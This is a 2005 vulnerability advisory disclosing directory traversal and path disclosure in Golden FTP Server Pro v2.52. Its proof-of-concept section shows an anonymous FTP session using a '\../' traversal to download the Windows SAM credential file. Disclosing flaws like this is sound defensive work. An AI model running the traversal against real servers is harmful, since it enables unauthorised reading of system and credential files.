Product: Golden Ftp Server Pro 

Affected Version(s) :  v2.52

***

Credit / Discovered by:   Lachlan. H

Date vendor notified:     02/05/2005

Patch Released:      N/A

Disclosure:       03/05/2005

***

External References:

http://secunia.com/advisories/15175/

http://www.securityfocus.com/bid/13479/info/

***

Product Description:
 
Golden FTP Server is extremely easy to use personal
FTP server for Windows and can be run by any person
who has the most basic computer skills. 
The program loads automatically on Windows startup and
you can identify the files you want to share with two
mouse clicks via the dialog window 
that works in the same way as the standard Windows
"Open File:" dialog or via the Windows Explorer
context menu. 
Golden FTP Server features clean and easy to
understand multi-lingual interface. Multi-threaded
downloads and ability to resume aborted downloads are
supported. 

***
 
Problem:

Directory Traversal / Path Disclosure.
 
It is possible for any user to break out of ftproot
via
directory traversal sequence. 
It is possible to access arbitrary files. It is also
possible to disclose shared path by requesting a
non-existent file.

Vulnerability found and tested on version 2.52. Other
versions may be affected.
 
 
In the following PoC c:\Temp is ftproot & mapped to
\Temp, for successful exploitation you must change
down (i.e, cd Temp) into the shared directory before
traversal sequence or disclosure of path.

No vendor response in relation to this issue. 
 
***

Fix:

Contact the vendor

www.goldenftpserver.com

***

PoC:

C:\>ftp ********
Connected to **********
220 Golden FTP Server PRO ready v2.52
User (********:(none)): anonymous
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd Temp
250 CWD Command successful.
ftp> GET "\../winnt/repair/sam
200 PORT Command successful.
150 File status okay; about to open data connection.
226 Closing data connection.
ftp: 24576 bytes received in 1.10Seconds
22.32Kbytes/sec.
ftp> !dir sam
 Volume in drive C has no label.
 Volume Serial Number is F4A5-2272
 
 Directory of C:\
 
26/04/2005  11:30 AM            24,576 Sam
               1 File(s)         24,576 bytes
               0 Dir(s)  30,103,302,656 bytes free
ftp>
 
*

C:\>ftp ****
Connected to ****
220 Golden FTP Server PRO ready v2.52
User (******:(none)): anonymous
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd Temp
250 CWD Command successful.
ftp> get C:\blah
200 PORT Command successful.
550 Cannot open file C:\Temp\C:\blah
 
***



__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com